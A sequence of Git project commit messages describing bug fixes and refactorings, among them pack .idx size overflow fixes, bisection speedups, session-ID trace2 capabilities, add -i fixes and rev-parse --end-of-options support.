Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When checking the trailing checksum hash of a .idx file, we pass the
whole buffer (minus the trailing hash) into a single call to
the_hash_algo->update_fn(). But we cast it to an "unsigned int". This
comes from c4001d92be (Use off_t when we really mean a file offset.,
2007-03-06). That commit started storing the index_size variable as an
off_t, but our mozilla-sha1 implementation from the time was limited to
a smaller size. Presumably the cast was a way of annotating that we
expected .idx files to be small, and so we didn't need to loop (as we do
for arbitrarily-large .pack files). Though as an aside it was still
wrong, because the mozilla function actually took a signed int.
These days our hash-update functions are defined to take a size_t, so we
can pass the whole buffer in directly. The cast is actually causing a
buggy truncation!
While we're here, though, let's drop the confusing off_t variable in the
first place. We're getting the size not from the filesystem anyway, but
from p->index_size, which is a size_t. In fact, we can make the code a
bit more readable by dropping our local variable duplicating
p->index_size, and instead have one that stores the size of the actual
index data, minus the trailing hash.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We sometimes store the offset into a pack .idx file as an "unsigned
long", but the mmap'd size of a pack .idx file can exceed 4GB. This is
sufficient on LP64 systems like Linux, but will be too small on LLP64
systems like Windows, where "unsigned long" is still only 32 bits. Let's
use size_t, which is a better type for an offset into a memory buffer.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
A pack and its matching .idx file are limited to 2^32 objects, because
the pack format contains a 32-bit field to store the number of objects.
Hence we use uint32_t in the code.
But the byte count of even a .idx file can be much larger than that,
because it stores at least a hash and an offset for each object. So
using SHA-1, a v2 .idx file will cross the 4GB boundary at 153,391,650
objects. This confuses load_idx(), which computes the minimum size like
this:
unsigned long min_size = 8 + 4*256 + nr*(hashsz + 4 + 4) + hashsz + hashsz;
Even though min_size will be big enough on most 64-bit platforms, the
actual arithmetic is done as a uint32_t, resulting in a truncation. We
actually exceed that min_size, but then we do:
unsigned long max_size = min_size;
if (nr)
max_size += (nr - 1)*8;
to account for the variable-sized table. That computation doesn't
overflow quite so low, but with the truncation for min_size, we end up
with a max_size that is much smaller than our actual size. So we
complain that the idx is invalid, and can't find any of its objects.
We can fix this case by casting "nr" to a size_t, which will do the
multiplication in 64-bits (assuming you're on a 64-bit platform; this
will never work on a 32-bit system since we couldn't map the whole .idx
anyway). Likewise, we don't have to worry about further additions,
because adding a smaller number to a size_t will convert the other side
to a size_t.
A few notes:
- obviously we could just declare "nr" as a size_t in the first place
(and likewise, packed_git.num_objects). But it's conceptually a
uint32_t because of the on-disk format, and we correctly treat it
that way in other contexts that don't need to compute byte offsets
(e.g., iterating over the set of objects should and generally does
use a uint32_t). Switching to size_t would make all of those other
cases look wrong.
- it could be argued that the proper type is off_t to represent the
file offset. But in practice the .idx file must fit within memory,
because we mmap the whole thing. And the rest of the code (including
the idx_size variable we're comparing against) uses size_t.
- we'll add the same cast to the max_size arithmetic line. Even though
we're adding to a larger type, which will convert our result, the
multiplication is still done as a 32-bit value and can itself
overflow. I didn't check this with my test case, since it would need
an even larger pack (~530M objects), but looking at compiler output
shows that it works this way. The standard should agree, but I
couldn't find anything explicit in 6.3.1.8 ("usual arithmetic
conversions").
The case in load_idx() was the most immediate one that I was able to
trigger. After fixing it, looking up actual objects (including the very
last one in sha1 order) works in a test repo with 153,725,110 objects.
That's because bsearch_hash() works with uint32_t entry indices, and the
actual byte access:
int cmp = hashcmp(table + mi * stride, sha1);
is done with "stride" as a size_t, causing the uint32_t "mi" to be
promoted to a size_t. This is the way most code will access the index
data.
However, I audited all of the other byte-wise accesses of
packed_git.index_data, and many of the others are suspect (they are
similar to the max_size one, where we are adding to a properly sized
offset or directly to a pointer, but the multiplication in the
sub-expression can overflow). I didn't trigger any of these in practice,
but I believe they're potential problems, and certainly adding in the
cast is not going to hurt anything here.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The previous two commits removed the last use of a function in this
library, but most of it had been dead code for a while[1][2]. Only the
"get_default_remote" function was still being used.
Even though we had a manual page for this library it was never
intended (or I expect, actually) used outside of git.git. Let's just
remove it, if anyone still cares about a function here they can pull
them into their own project[3].
1. Last use of error_on_missing_default_upstream():
d03ebd411c ("rebase: remove the rebase.useBuiltin setting",
2019-03-18)
2. Last use of get_remote_merge_branch(): 49eb8d39c7 ("Remove
contrib/examples/*", 2018-03-25)
3. https://lore.kernel.org/git/87a6vmhdka.fsf@evledraar.gmail.com/
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Remove the now-redundant "get_default_remote" function by converting
its last user to the "print-default-remote" helper.
As can be seen in 13424764db ("submodule: port submodule subcommand
'sync' from shell to C", 2018-01-15) this helper is already used
internally by the C code for submodule remote name discovery.
The "get_default_remote" function in "git-parse-remote.sh" will be
removed in a follow-up change.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Replace a use of the get_default_remote() function with an invocation
of "git fetch"
The "fetch" command already has logic to discover the remote for the
current branch. However, before it learned to accept a custom
refspec *and* use its idea of the default remote, it wasn't possible
to get rid of some equivalent of the "get_default_remote" invocation
here.
As it turns out the recently added "--stdin" option to fetch[1] gives
us a way to do that. Let's use it instead.
While I'm at it simplify the "fetch_in_submodule" function. It wasn't
necessary to pass "$@" to "fetch" since we'd only ever provide one
SHA-1 as an argument in the previous "*" codepath (in addition to
"--depth=N"). Rewrite the function to more narrowly reflect its
use-case.
1. https://lore.kernel.org/git/87eekwf87n.fsf@evledraar.gmail.com/
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In 't5310-pack-bitmaps.sh' two tests make sure that our pack bitmaps
are compatible with JGit's bitmaps. Alas, not even the most recent
JGit version (5.9.0.202009080501-r) supports SHA256 yet, so when this
test script is run with GIT_TEST_DEFAULT_HASH=sha256 on a setup with
JGit installed in PATH, then these two tests fail.
Protect these two tests with the SHA1 prereq in order to skip them
when testing with SHA256.
Signed-off-by: SZEDER Gábor <szeder.dev@gmail.com>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
A regression has been introduced by a62387b (submodule.c: fetch in
submodules git directory instead of in worktree, 2018-11-28).
The scenario in which it triggers is when one has a remote repository
with a subrepository inside a subrepository like this:
superproject/middle_repo/inner_repo
Person A and B have both a clone of it, while Person B is not working
with the inner_repo and thus does not have it initialized in his working
copy.
Now person A introduces a change to the inner_repo and propagates it
through the middle_repo and the superproject.
Once person A pushed the changes and person B wants to fetch them using
"git fetch" on superproject level, B's git call will return with error
saying:
Could not access submodule 'inner_repo'
Errors during submodule fetch:
middle_repo
Expectation is that in this case the inner submodule will be recognized
as uninitialized subrepository and skipped by the git fetch command.
This used to work correctly before 'a62387b (submodule.c: fetch in
submodules git directory instead of in worktree, 2018-11-28)'.
Starting with a62387b the code wants to evaluate "is_empty_dir()" inside
.git/modules for a directory only existing in the worktree, delivering
then of course wrong return value.
This patch reverts the changes of a62387b and introduces a regression
test.
Signed-off-by: Peter Kaestle <peter.kaestle@nokia.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Call hashwrite_be64() to write a 64-bit value instead of open-coding it
using htonl() and hashwrite(). This shortens the code, gets rid of a
buffer and several magic numbers, and makes the intent clearer.
Signed-off-by: René Scharfe <l.s.r@web.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Call hashwrite_be64() to write 64-bit values instead of open-coding it
using hashwrite_be32() and sizeof. This shortens the code and makes its
intent clearer.
Signed-off-by: René Scharfe <l.s.r@web.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add a helper function for hashing and writing 64-bit integers in network
byte order. It returns the number of written bytes. This simplifies
callers that keep track of the file offset, even though this number is a
constant.
Suggested-by: Derrick Stolee <dstolee@microsoft.com>
Original-patch-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: René Scharfe <l.s.r@web.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
'git bisect start ...' and subsequent 'git bisect (good|bad)' commands
can take quite a while when the given/remaining revision range between
good and bad commits is big and contains a lot of merge commits, e.g.
in git.git:
$ git rev-list --count v1.6.0..v2.28.0
44284
$ time git bisect start v2.28.0 v1.6.0
Bisecting: 22141 revisions left to test after this (roughly 15 steps)
[e197c21807] unable_to_lock_die(): rename function from unable_to_lock_index_die()
real 0m15.472s
user 0m15.220s
sys 0m0.255s
The majority of the runtime is spent in do_find_bisection(), where we
try to find a commit as close as possible to the halfway point between
the bad and good revisions, i.e. a commit from which the number of
reachable commits that are in the good-bad range is half the total
number of commits in that range. So we count how many commits are
reachable in the good-bad range for each commit in that range, which
is quick and easy for a linear history, even over 300k commits in a
linear range are handled in ~0.3s on my machine. Alas, handling merge
commits is non-trivial and quite expensive as the algorithm used seems
to be quadratic, causing the long runtime shown above.
Interestingly, look at what a big difference one additional commit
can make:
$ git rev-list --count v1.6.0^..v2.28.0
44285
$ time git bisect start v2.28.0 v1.6.0^
Bisecting: 22142 revisions left to test after this (roughly 15 steps)
[565301e416] Sync with 2.1.2
real 0m5.848s
user 0m5.600s
sys 0m0.252s
The difference is caused by one of the optimizations attempting to cut
down the runtime added in 1c4fea3a40 (git-rev-list --bisect:
optimization, 2007-03-21):
Another small optimization is whenever we find a half-way commit
(that is, a commit that can reach exactly half of the commits),
we stop giving counts to remaining commits, as we will not find
any better commit than we just found.
In this second 'git bisect start' command we happen to find a commit
exactly at the halfway point and can return early, but in the first
case there is no such commit, so we can't return early and end up
counting the number of reachable commits from all commits in the
good-bad range.
However, when we have thousands of commits it's not all that important
to find the _exact_ halfway point, a few commits more or less doesn't
make any real difference for the bisection.
So let's loosen the check in the halfway() helper to consider commits
within about 0.1% of the exact halfway point as halfway as well, and
rename the function to approx_halfway() accordingly. This will allow
us to return early on a bigger good-bad range, even when there is no
commit exactly at the halfway point, thereby reducing the runtime of
the first command above considerably, from ~15s to 4.901s.
Furthermore, even if there is a commit exactly at the halfway point,
we might still stumble upon a commit within that 0.1% range before
finding the exact halfway point, allowing us to return a bit earlier,
slightly reducing the runtime of the second command from 5.848s to
5.058s. Note that this change doesn't affect good-bad ranges
containing ~2000 commits or less, because that 0.1% tolerance becomes
zero due to integer arithmetic; however, if the range is that small
then counting the reachable commits for all commits is already fast
enough anyway.
Naturally, this will likely change which commits get picked at each
bisection step, and, in turn, might change how many bisection steps
are necessary to find the first bad commit. If the number of
necessary bisection steps were to increase often, then this change
could backfire, because building and testing at each step might take
much longer than the time spared. OTOH, if the number of steps were
to decrease, then it would be a double win.
So I ran some tests to see how often that happens: picked random good
and bad starting revisions at least 50k commits apart and a random
first bad commit in between in git.git, and used 'git bisect run git
merge-base --is-ancestor HEAD $first_bad_commit' to check the number
of necessary bisection steps. After repeating all this 1000 times
both with and without this patch I found that:
- 146 cases needed one more bisection step than before, 149 cases
needed one less step, while in the remaining 705 cases the number
of steps didn't change. So the number of bisection steps does
indeed change in a non-negligible number of cases, but it seems
that the average number of steps doesn't change in the long run.
- The first 'git bisect start' command got over 3x faster in 456
cases, so this "no commit at the exact halfway point" case seems
to be common enough to care about.
Signed-off-by: SZEDER Gábor <szeder.dev@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When receive-pack receives a session-id capability from the client, log
the received session ID via a trace2 data event.
Signed-off-by: Josh Steadmon <steadmon@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When the server sent a session-id capability and transfer.advertiseSID
is true, advertise send-pack's own session ID back to the server.
Signed-off-by: Josh Steadmon <steadmon@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When upload-pack (protocol v0/v1) or a protocol v2 server receives a
session-id capability from a client, log the received session ID via a
trace2 data event.
Signed-off-by: Josh Steadmon <steadmon@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When the server sent a session-id capability and transfer.advertiseSID
is true, advertise fetch-pack's own session ID back to the server.
Signed-off-by: Josh Steadmon <steadmon@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When a client receives a session-id capability from a protocol v0, v1,
or v2 server, log the received session ID via a trace2 data event.
Signed-off-by: Josh Steadmon <steadmon@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When transfer.advertiseSID is true, advertise the server's session ID
for all protocol v2 connections via the new session-id capability.
Signed-off-by: Josh Steadmon <steadmon@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When transfer.advertiseSID is true, advertise receive-pack's session ID
via the new session-id capability.
Signed-off-by: Josh Steadmon <steadmon@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When transfer.advertiseSID is true, advertise upload-pack's session ID
via the new session-id capability.
Signed-off-by: Josh Steadmon <steadmon@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add a public wrapper, trace2_session_id(), around tr2_sid_get(), which
is intended to be private trace2 implementation.
Signed-off-by: Josh Steadmon <steadmon@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Document a new config option that allows users to determine whether or
not to advertise their session IDs to remote Git clients and servers.
Signed-off-by: Josh Steadmon <steadmon@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In future patches, we will add the ability for Git servers and clients
to advertise unique session IDs via protocol capabilities. This
allows for easier debugging when both client and server logs are
available.
Signed-off-by: Josh Steadmon <steadmon@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Recently the format of an internal state file "rebase -i" uses has
been tightened up for consistency, which would hurt those who start
"rebase -i" with old git and then continue with new git. Loosen
the reader side a bit (which we may want to tighten again in a year
or so).
* jc/sequencer-stopped-sha-simplify:
sequencer: tolerate abbreviated stopped-sha file
Test code clean-up.
* js/test-whitespace-fixes:
t9603: use tabs for indentation
t5570: remove trailing padding
t5400,t5402: consistently indent with tabs, not with spaces
t3427: adjust stale comment
t3406: indent with tabs, not spaces
t1004: insert missing "branch" in a message
The documentation on the "--abbrev=<n>" option did not say the
output may be longer than "<n>" hexdigits, which has been
clarified.
* jc/abbrev-doc:
doc: clarify that --abbrev=<n> is about the minimum length
In 83bbf9b92e (mergetool--lib: improve support for vimdiff-style tool
variants, 2020-07-29), we introduced a `list_tool_variants` function
in the spirit of Postel's Law: be lenient in what you accept as input.
In this particular instance, we wanted to allow not only `bc` but also
`bc3` as name for the Beyond Compare tool.
However, what this patch overlooked is that it is totally allowed for
users to override the defaults in `mergetools/`. But now that we strip
off trailing digits, the name that the user gave the tool might not
actually be in the list produced by `list_tool_variants`.
So let's do the same as for the `diff_cmd` and the `merge_cmd`: override
it with the trivial version in case a user-defined setup was detected.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
As of 83bbf9b92e (mergetool--lib: improve support for vimdiff-style
tool variants, 2020-07-29), we already list `bc` and `bc3` as aliases
for that mergetool/difftool.
However, the current Beyond Compare version is _4_, therefore the `bc4`
alias is missing from that list.
Most notably, this is the root cause of the breakage reported in
https://github.com/git-for-windows/git/issues/2893 where a
well-configured `bc4` difftool stopped working as of v2.29.0:
`setup_tool` would notice that after stripping off the trailing digit,
it finds a match in `mergetools/` (the `bc` file), source it, and then
the alias would not match the list offered by the `list_tool_variants`
function, and simply exit without doing anything, but pretending
success.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
* en/strmap:
shortlog: use strset from strmap.h
Use new HASHMAP_INIT macro to simplify hashmap initialization
strmap: take advantage of FLEXPTR_ALLOC_STR when relevant
strmap: enable allocations to come from a mem_pool
strmap: add a strset sub-type
strmap: split create_entry() out of strmap_put()
strmap: add functions facilitating use as a string->int map
strmap: enable faster clearing and reusing of strmaps
strmap: add more utility functions
strmap: new utility functions
hashmap: provide deallocation function names
hashmap: introduce a new hashmap_partial_clear()
hashmap: allow re-use after hashmap_free()
hashmap: adjust spacing to fix argument alignment
hashmap: add usage documentation explaining hashmap_free[_entries]()
Now that hashamp has lazy initialization and a HASHMAP_INIT macro,
hashmaps allocated on the stack can be initialized without a call to
hashmap_init() and in some cases makes the code a bit shorter. Convert
some callsites over to take advantage of this.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
By default, we do not use a mempool and strdup_strings is true; in this
case, we can avoid both an extra allocation and an extra free by just
over-allocating for the strmap_entry leaving enough space at the end to
copy the key. FLEXPTR_ALLOC_STR exists for exactly this purpose, so
make use of it.
Also, adjust the case when we are using a memory pool and strdup_strings
is true to just do one allocation from the memory pool instead of two so
that the strmap_clear() and strmap_remove() code can just avoid freeing
the key in all cases.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
For heavy users of strmaps, allowing the keys and entries to be
allocated from a memory pool can provide significant overhead savings.
Add an option to strmap_init_with_options() to specify a memory pool.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In the verison negotiation phase between "receive-pack" and
"proc-receive", "proc-receive" can send an empty flush-pkt to end the
negotiation and use default version 0. Capabilities (such as
"push-options") are not supported in version 0.
Signed-off-by: Jiang Xin <zhiyou.jx@alibaba-inc.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Johannes found a flaky hang in `t5411/test-0013-bad-protocol.sh` in the
osx-clang job of the CI/PR builds, and ran into an issue when using
the `--stress` option with the following error messages:
fatal: unable to write flush packet: Broken pipe
send-pack: unexpected disconnect while reading sideband packet
fatal: the remote end hung up unexpectedly
In this test case, the "proc-receive" hook sends an error message and
dies earlier. While "receive-pack" on the other side of the pipe
should forward the error message of the "proc-receive" hook to the
client side, but it fails to do so. This is because "receive-pack"
uses `packet_write_fmt()` and `packet_flush()` to write pkt-line
message to "proc-receive" hook, and these functions die immediately
when pipe is broken. Using "gently" forms for these functions will get
more predicable output.
Add more "--die-*" options to test helper to test different stages of
the protocol between "receive-pack" and "proc-receive" hook.
Reported-by: Johannes Schindelin <Johannes.Schindelin@gmx.de>
Suggested-by: Jeff King <peff@peff.net>
Signed-off-by: Jiang Xin <zhiyou.jx@alibaba-inc.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
New helper `filter_out_user_friendly_and_stable_output` will call
common helpr function `make_user_friendly_and_stable_output` and use
additional arguments to filter out messages for specific test cases.
Suggested-by: Junio C Hamano <gitster@pobox.com>
Signed-off-by: Jiang Xin <zhiyou.jx@alibaba-inc.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The NEEDS_SSL_WITH_CURL flag was still being set in one case, but
hasn't existed since 23c4bbe28e ("build: link with curl-defined
linker flags", 2018-11-03). Remove it, and a comment which referred to
it. See 6c109904bc ("Port to HP NonStop", 2012-09-19) for the initial
addition of the comment.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The NO_R_TO_GCC_LINKER flag was still being on some platforms. It
hasn't been used since my 0f50c8e32c ("Makefile: remove the
NO_R_TO_GCC_LINKER flag", 2019-05-17).
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In 1af265f0 (compat/bswap.h: simplify MSVC endianness
detection, 2020-11-08) we attempted to simplify code by assuming MSVC
builds will be for little-endian machines, since only unusably old
versions of MSVC supported big-endian MIPS and m68k architectures.
However, it's possible that MSVC could be ported to build for a
big-endian architecture again, so the simplification wasn't as
future-proof as hoped.
So let's go back to the old way of detecting MSVC, and then checking
architecture from a list of little-endian architecture macros.
Note that MSVC does not treat ARM64 as bi-endian, so we can safely treat
it as little-endian.
Helped-by: brian m. carlson <sandals@crustytoothpaste.net>
Helped-by: Jeff King <peff@peff.net>
Helped-by: Johannes Schindelin <Johannes.Schindelin@gmx.de>
Helped-by: Junio C Hamano <gitster@pobox.com>
Signed-off-by: Daniel Gurney <dgurney99@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The builtin version of add-interactive mistakenly loads diff colors from
color.interactive.* instead of color.diff.*. It also accidentally spells
`frag` as `fraginfo`.
Let's fix that.
Note also that we don't respect the historical `diff.color.*`. The perl
version never did, and those have been deprecated since 2007.
Reported-by: Philippe Blain <levraiphilippeblain@gmail.com>
Co-authored-by: Jeff King <peff@peff.net>
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The Perl version of that command sneakily uses `git config --get-color`
to figure out the ANSI sequence to reset the color, but passes the empty
string and therefore cannot actually match any config entry.
This was missed when re-implementing the command as a built-in command.
Let's fix this, preventing the `reset` sequence from being overridden
via the config.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We already maintain a list of colors in the `add_i_state`, therefore we
should use them.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In libxdiff, imitating GNU diff, the hunk headers only show the line
count if it is different from 1. When splitting hunks, the Perl version
of `git add -p` already imitates this. Let's do the same in the built-in
version of said command.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The Perl version of that command already does that since a301973641
(add -p: print errors in separate color, 2009-02-05). The built-in
version's development started by reimplementing the initial version from
5cde71d64a (git-add --interactive, 2006-12-10) for simplicity, though,
which still printed error messages to stdout.
Let's fix that by imitating the Perl version's behavior in the built-in
version of that command.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
There is a neat feature in `git add -i` where it allows users to select
items via unique prefixes.
In the built-in version of `git add -i`, we specifically sort the items
(unless they are already sorted) and then perform a binary search to
figure out whether the input constitutes a unique prefix. Unfortunately,
by mistake this code misidentifies matches even if the input string is
not actually a prefix of any item.
For example, in the initial menu, where there is a `status` and an
`update` command, the input `tadaa` was mistaken as a prefix of
`update`.
Let's fix this by looking a bit closer whether the input is actually a
prefix of the item at the found insert index.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We taught rev-list a new way to separate options from revisions in
19e8789b23 (revision: allow --end-of-options to end option parsing,
2019-08-06), but rev-parse uses its own parser. It should know about
--end-of-options not only for consistency, but because it may be
presented with similarly ambiguous cases. E.g., if a caller does:
git rev-parse "$rev" -- "$path"
to parse an untrusted input, then it will get confused if $rev contains
an option-like string like "--local-env-vars". Or even "--not-real",
which we'd keep as an option to pass along to rev-list.
Or even more importantly:
git rev-parse --verify "$rev"
can be confused by options, even though its purpose is safely parsing
untrusted input. On the plus side, it will always fail the --verify
part, as it will not have parsed a revision, so the caller will
generally "fail closed" rather than continue to use the untrusted
string. But it will still trigger whatever option was in "$rev"; this
should be mostly harmless, since rev-parse options are all read-only,
but I didn't carefully audit all paths.
This patch lets callers write:
git rev-parse --end-of-options "$rev" -- "$path"
and:
git rev-parse --verify --end-of-options "$rev"
which will both treat "$rev" always as a revision parameter. The latter
is a bit clunky. It would be nicer if we had defined "--verify" to
require that its next argument be the revision. But we have not
historically done so, and:
git rev-parse --verify -q "$rev"
does currently work. I added a test here to confirm that we didn't break
that.
A few implementation notes:
- We don't document --end-of-options explicitly in commands, but rather
in gitcli(7). So I didn't give it its own section in git-rev-parse(1).
But I did call it out specifically in the --verify section, and
include it in the examples, which should show best practices.
- We don't have to re-indent the main option-parsing block, because we
can combine our "did we see end of options" check with "does it start
with a dash". The exception is the pre-setup options, which need
their own block.
- We do however have to pull the "--" parsing out of the "does it start
with dash" block, because we want to parse it even if we've seen
--end-of-options.
- We'll leave "--end-of-options" in the output. This is probably not
technically necessary, as a careful caller will do:
git rev-parse --end-of-options $revs -- $paths
and anything in $revs will be resolved to an object id. However, it
does help a slightly less careful caller like:
git rev-parse --end-of-options $revs_or_paths
where a path "--foo" will remain in the output as long as it also
exists on disk. In that case, it's helpful to retain --end-of-options
to get passed along to rev-list, s it would otherwise see just
"--foo".
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The option-parsing loop of rev-parse checks whether the first character
of an arg is "-". If so, then it enters a series of conditionals
checking for individual options. But some options are inexplicably
outside of that outer conditional.
This doesn't produce the wrong behavior; the conditional is actually
redundant with the individual option checks, and it's really only its
fallback "continue" that we care about. But we should at least be
consistent.
One obvious alternative is that we could get rid of the conditional
entirely. But we'll be using the extra block it provides in the next
patch.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Because of the order in which we check options in rev-parse, there are a
few options we accept even after a "--". This is wrong, because the
whole point of "--" is to say "everything after here is a path". Let's
move the "did we see a dashdash" check (it's called "as_is" in the code)
to the top of the parsing loop.
Note there is one subtlety here. The options are ordered so that some
are checked before we even see if we're in a repository (they continue
the loop, and if we get past a certain point, then we do the repository
setup). By moving the as_is check higher, it's also in that "before
setup" section, even though it might look at the repository via
verify_filename(). However, this works out: we'd never set as_is until
we parse "--", and we don't parse that until after doing the setup.
An alternative here to avoid the subtlety is to put the as_is check at
the top of the post-setup options. But then every pre-setup option would
have to remember to check "if (!as_is && !strcmp(...))". So while this
is a bit magical, it's harder for future code to get wrong.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Since 610e2b9240 (blame: validate and peel the object names on the
ignore list, 2020-09-24) git blame reports checks if objects specified
with --ignore-rev and in files loaded with --ignore-revs-file and config
option blame.ignoreRevsFile are actual objects and dies if they aren't.
The intent is to report typos to the user.
This also breaks the ability to use a single ignore file for multiple
repositories. Typos are presumably less likely in files than on the
command line, so alerting is less useful here. Restore that feature by
skipping non-commits without dying.
Reported-by: Jean-Yves Avenard <jyavenard@mozilla.com>
Signed-off-by: René Scharfe <l.s.r@web.de>
Reviewed-by: Barret Rhoden <brho@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
It is possible to have recursive aliases like:
l = log --oneline
lg = l --graph
So the completion should detect such aliases as well.
Signed-off-by: Felipe Contreras <felipe.contreras@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
For the past 15 years, we've used the hardcoded 64 as the length
limit of the filename of the output from the "git format-patch"
command. Since the value is shorter than the 80-column terminal, it
could grow without line wrapping a bit. At the same time, since the
value is longer than half of the 80-column terminal, we could fit
two or more of them in "ls" output on such a terminal if we allowed
to lower it.
Introduce a new command line option --filename-max-length=<n> and a
new configuration variable format.filenameMaxLength to override the
hardcoded default.
While we are at it, remove a check that the name of output directory
does not exceed PATH_MAX---this check is pointless in that by the
time control reaches the function, the caller would already have
done an equivalent of "mkdir -p", so if the system does not like an
overly long directory name, the control wouldn't have reached here,
and otherwise, we know that the system allowed the output directory
to exist. In the worst case, we will get an error when we try to
open the output file and handle the error correctly anyway.
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Prepare a test script to transition of the default branch name to
'main'.
* js/default-branch-name-adjust-t5411:
t5411: finish preparing for `main` being the default branch name
t5411: adjust the remaining support files for init.defaultBranch=main
t5411: start adjusting the support files for init.defaultBranch=main
t5411: start using the default branch name "main"
The code to detect premature EOF in the sideband demultiplexer has
been cleaned up.
* jk/sideband-more-error-checking:
sideband: diagnose more sideband anomalies
Exit codes from "git remote add" etc. were not usable by scripted
callers.
* ab/git-remote-exit-code:
remote: add meaningful exit code on missing/existing
A commit and tag object may have CR at the end of each and
every line (you can create such an object with hash-object or
using --cleanup=verbatim to decline the default clean-up
action), but it would make it impossible to have a blank line
to separate the title from the body of the message. Be lenient
and accept a line with lone CR on it as a blank line, too.
* pb/ref-filter-with-crlf:
log, show: add tests for messages containing CRLF
ref-filter: handle CRLF at end-of-line more gracefully
"git checkout-index" did not consistently signal an error with its
exit status.
* jk/checkout-index-errors:
checkout-index: propagate errors to exit code
checkout-index: drop error message from empty --stage=all
"git diff" and other commands that share the same machinery to
compare with working tree files have been taught to take advantage
of the fsmonitor data when available.
* nk/diff-files-vs-fsmonitor:
p7519-fsmonitor: add a git add benchmark
p7519-fsmonitor: refactor to avoid code duplication
perf lint: add make test-lint to perf tests
t/perf: add fsmonitor perf test for git diff
t/perf/p7519-fsmonitor.sh: warm cache on first git status
t/perf/README: elaborate on output format
fsmonitor: use fsmonitor data in `git diff`
More preliminary tests have been added to document desired outcome
of various "directory rename" situations.
* en/dir-rename-tests:
t6423: more involved rules for renaming directories into each other
t6423: update directory rename detection tests with new rule
t6423: more involved directory rename test
directory-rename-detection.txt: update references to regression tests
This patch will let the new `check-whitespace` GitHub workflow be happy
with the upcoming patch series that wants to search-and-replace `master`
with `main` in t9603 and some other test scripts.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Two blocks in t5570 want to align the closing double quotes, padding
with spaces if needed. Since the maximum length of those lines is
defined by the branch name `master`, the upcoming rename to `main` would
unalign the quotes.
But then, it is unclear how those aligned closing quotes should help
readability anyway, so let's just remove that padding altogether.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This patch actually prepares for the upcoming patches to replace
`master` with `main` in these tests: we do not want those changes to be
flagged by the new `check-whitespace` GitHub workflow (even if those
changes do not introduce the whitespace issues, they touch lines
affected by those issues without fixing them).
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
